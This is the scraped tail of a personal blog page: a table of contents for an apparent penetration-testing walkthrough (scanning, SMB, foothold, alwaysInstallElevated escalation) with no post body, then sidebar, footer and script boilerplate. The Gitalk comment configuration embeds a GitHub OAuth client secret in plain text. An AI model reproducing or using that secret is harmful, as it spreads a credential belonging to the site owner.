          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Difficulty"><span class="nav-text">Difficulty</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Scan"><span class="nav-text">Scan</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#21-ftp"><span class="nav-text">21 ftp</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#80-443-xampp"><span class="nav-text">80&#x2F;443 xampp</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#445-smb"><span class="nav-text">445  smb</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Foothold"><span class="nav-text">Foothold</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Escalation"><span class="nav-text">Escalation</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#alwaysInstallElevated"><span class="nav-text">alwaysInstallElevated</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%8F%8D%E6%80%9D"><span class="nav-text">反思</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Yiaos</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">22</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/yiaos" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;yiaos" rel="external nofollow noopener noreferrer" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="external nofollow noopener noreferrer" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>



      </div>
        <div class="back-to-top motion-element">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Yiaos</span>
</div>
        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="Total Visitors">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="Total Views">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/medium-zoom@1/dist/medium-zoom.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/lozad@1/dist/lozad.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/pangu@4/dist/browser/pangu.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>

<script src="/js/bookmark.js"></script>




  
  <script>
    (function(){
      var canonicalURL, curProtocol;
      //Get the <link> tag
      var x=document.getElementsByTagName("link");
		//Find the last canonical URL
		if(x.length > 0){
			for (i=0;i<x.length;i++){
				if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){
					canonicalURL=x[i].href;
				}
			}
		}
    //Get protocol
	    if (!canonicalURL){
	    	curProtocol = window.location.protocol.split(':')[0];
	    }
	    else{
	    	curProtocol = canonicalURL.split(':')[0];
	    }
      //Get current URL if the canonical URL does not exist
	    if (!canonicalURL) canonicalURL = window.location.href;
	    //Assign script content. Replace current URL with the canonical URL
      !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=canonicalURL,t=document.referrer;if(!e.test(r)){var n=(String(curProtocol).toLowerCase() === 'https')?"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif":"//api.share.baidu.com/s.gif";t?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var i=new Image;i.src=n}}(window);})();
  </script>




  
<script src="/js/local-search.js"></script>













  

  

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.css">

<script>
NexT.utils.loadComments(document.querySelector('#gitalk-container'), () => {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js', () => {
    var gitalk = new Gitalk({
      clientID    : 'Ov23lioxBWzEMyWt1JhD',
      clientSecret: '6d63e8f9065e954d63e6a90407d40a3ccee85f0e',
      repo        : 'Yiaos.github.io',
      owner       : 'Yiaos',
      admin       : ['Yiaos'],
      id          : 'd520d0b931fd67d5c4ffd8b12a955bda',
        language: 'en',
      distractionFreeMode: true
    });
    gitalk.render('gitalk-container');
  }, window.Gitalk);
});
</script>

</body>
</html>
